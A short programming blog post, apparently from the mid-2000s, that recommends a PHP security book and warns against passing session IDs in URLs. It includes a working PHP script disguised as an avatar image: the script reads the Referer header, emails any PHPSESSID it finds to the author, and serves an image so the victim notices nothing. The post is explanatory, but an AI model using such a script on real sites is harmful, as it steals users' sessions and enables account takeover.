Jim Plush's Programming Paradise

Just started reading Ilia Alshanetsky's new PHP Guide to Security book found over at http://www.phparch.com and I must say this is a must have book for any serious php developers. The session security chapter alone is worth the price. Here is a little script I wrote which should point out why you should NEVER keep any personal information on a site that transmits their session IDS through the URL.

Lets say we're on a web forum together on site www.xyz.com and I'm allowed to post a URL to an image in my avatar, well instead of www.jimsite.com/myimage.jpg I make it www.jimsite.com/fake_image.php

so the html would output



If your URL string has the session ID passed in it like www.xyz.com?PHPSESSID=593584jgjdl59 and you view the page that has my image.. guess what I can write:

 
<?php
$referrer = $_SERVER['HTTP_REFERER'];
 
// lets check to see if we got something juicy
if(strstr($referrer, 'PHPSESSID=')) {
	mail('jplush76@gmail.com', 'GOT A SESSION ID!', $referrer);
}
$type = filetype('img.jpg');
header("Content-type: $type");
echo file_get_contents('img.jpg');
?>
 

so it looks like it still outputs my image however I just emailed myself your URL string if it contains the PHPSESSID which is the default Session ID name PHP uses. So once I get that email I can copy/paste into my browser and guess what, I'm now you. I can get into your account and do whatever I want and it was pretty darn easy.

be warned.. and get that book!